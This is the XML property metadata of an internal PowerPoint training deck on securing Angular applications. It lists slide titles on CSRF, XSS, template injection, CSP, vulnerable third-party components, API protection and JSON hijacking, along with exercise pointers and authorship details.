      <vt:lpstr>Secure your Angular Application   CSRF – Which Protection for Angular ? </vt:lpstr>
      <vt:lpstr>CSRF protection  Demo (AngularJS)</vt:lpstr>
      <vt:lpstr>Présentation PowerPoint</vt:lpstr>
      <vt:lpstr>PW - XSRF    Exercises :    Follow practical_works/PW-XSRF.txt instructions</vt:lpstr>
      <vt:lpstr>Cross-Site Scripting  (XSS)</vt:lpstr>
      <vt:lpstr>Secure your Angular Application       XSS </vt:lpstr>
      <vt:lpstr>Secure your Angular Application       XSS </vt:lpstr>
      <vt:lpstr>Secure your Angular Application          XSS Angular Protection   Angular escapes and sanitizes natively </vt:lpstr>
      <vt:lpstr>Secure your Angular Application     XSS Angular Protection </vt:lpstr>
      <vt:lpstr>PW - XSS   Exercises :    Follow practical_works/PW-XSS.txt instructions</vt:lpstr>
      <vt:lpstr>Template injection</vt:lpstr>
      <vt:lpstr>Secure your Angular Application           Expression sandbox </vt:lpstr>
      <vt:lpstr>Secure your Angular Application             Template injection </vt:lpstr>
      <vt:lpstr>Secure your Angular Application    Template injection Mitigation </vt:lpstr>
      <vt:lpstr>Secure your Angular Application        Template injection Mitigation </vt:lpstr>
      <vt:lpstr>Content Security Policy (CSP)</vt:lpstr>
      <vt:lpstr>Secure your Angular Application     XSS Browser protection </vt:lpstr>
      <vt:lpstr>Secure your Angular Application       CSP </vt:lpstr>
      <vt:lpstr>Secure your Angular Application                  CSP </vt:lpstr>
      <vt:lpstr>Secure your Angular Application       CSP </vt:lpstr>
      <vt:lpstr>CSP evaluator  Demo </vt:lpstr>
      <vt:lpstr>Présentation PowerPoint</vt:lpstr>
      <vt:lpstr>PW - CSP   Exercises :    Follow practical_works/PW-CSP.txt instructions</vt:lpstr>
      <vt:lpstr>Third party components with known vulnerabilities (A9) </vt:lpstr>
      <vt:lpstr>Secure your Angular Application  3rd party components with known vulnerabilities</vt:lpstr>
      <vt:lpstr>Secure your Angular Application      A9 Mitigation </vt:lpstr>
      <vt:lpstr>Secure your Angular Application      A9 Mitigation </vt:lpstr>
      <vt:lpstr>Secure your Angular Application      A9 Mitigation </vt:lpstr>
      <vt:lpstr>Secure your Angular Application      3rd party components </vt:lpstr>
      <vt:lpstr>Secure your Angular Application      3rd party components </vt:lpstr>
      <vt:lpstr>Secure your Angular Application      3rd party components </vt:lpstr>
      <vt:lpstr>PW – third-party-components    Exercises :    Follow practical_works/PW-Third-Party-Components.txt instructions</vt:lpstr>
      <vt:lpstr>API Protection Authorization Cross Origin Resource Sharing (CORS) </vt:lpstr>
      <vt:lpstr>Secure your Angular Application            API Protection </vt:lpstr>
      <vt:lpstr>Secure your Angular Application            API Protection </vt:lpstr>
      <vt:lpstr>Secure your Angular Application            API Protection </vt:lpstr>
      <vt:lpstr>Secure your Angular Application            API Protection </vt:lpstr>
      <vt:lpstr>PW – API-Protection (1/2)   Installation :    git clone -b PW-JWT-OAuth https://gitlab.kazan.priv.atos.fr/trainingangular2/secure-angular-training-app.git  Exercises :    Follow practical_works/PW-API-Protection_part_1.txt instructions</vt:lpstr>
      <vt:lpstr>Secure your Angular Application            API Protection </vt:lpstr>
      <vt:lpstr>Secure your Angular Application            API Protection </vt:lpstr>
      <vt:lpstr>Secure your Angular Application            API Protection </vt:lpstr>
      <vt:lpstr>PW – API-Protection (2/2)    Exercises :    Follow practical_works/PW-API-Protection_part_2.txt instructions</vt:lpstr>
      <vt:lpstr>JSON Hijacking  (XSSI)</vt:lpstr>
      <vt:lpstr>Secure your Angular Application                     JSON hijacking </vt:lpstr>
      <vt:lpstr>Secure your Angular Application      JSON hijacking </vt:lpstr>
      <vt:lpstr>Secure your Angular Application                     JSON hijacking Protection </vt:lpstr>
      <vt:lpstr>Secure your Angular Application                     JSON Hijacking Angular built-in Protection  </vt:lpstr>
      <vt:lpstr>PW - JSONP   Exercises :    Follow practical_works/PW-JSONP.txt instructions</vt:lpstr>
      <vt:lpstr>Secure your Angular Application                 Global recommendations </vt:lpstr>
      <vt:lpstr>Secure your AngularJS Application</vt:lpstr>
      <vt:lpstr>Secure your Angular Application</vt:lpstr>
      <vt:lpstr>Secure your Angular Application              Angular security hardening </vt:lpstr>
      <vt:lpstr>Secure your Angular Application           SDCO Security Support for Angular </vt:lpstr>
      <vt:lpstr>Thanks</vt:lpstr>
    </vt:vector>
  </TitlesOfParts>
  <Company>Worldline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Windows User</dc:creator>
  <cp:lastModifiedBy>Khadri Nourredine</cp:lastModifiedBy>
  <cp:revision>1056</cp:revision>
  <cp:lastPrinted>2017-06-08T15:08:14Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2015-05-04T06:33:51Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-11-13T10:44:42Z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um">
    <vt:lpwstr>dd-mm-yyyy</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="Author">
    <vt:lpwstr>Author</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="4" name="GBU">
    <vt:lpwstr>GBU</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="5" name="Division">
    <vt:lpwstr>Division</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="6" name="Department">
    <vt:lpwstr>Department</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="7" name="Classification">
    <vt:lpwstr>© For internal use</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="8" name="ContentTypeId">
    <vt:lpwstr>0x0101007F74AEDDF85DCC4B951D8BF5474030C9</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="9" name="_dlc_DocIdItemGuid">
    <vt:lpwstr>23b74b67-1958-4696-b6ec-d7b880356c45</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="10" name="Order">
    <vt:r8>3000</vt:r8>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="11" name="xd_ProgID">
    <vt:lpwstr/>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="12" name="_SourceUrl">
    <vt:lpwstr/>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="13" name="_SharedFileIndex">
    <vt:lpwstr/>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="14" name="TemplateUrl">
    <vt:lpwstr/>
  </property>
</Properties>
</file>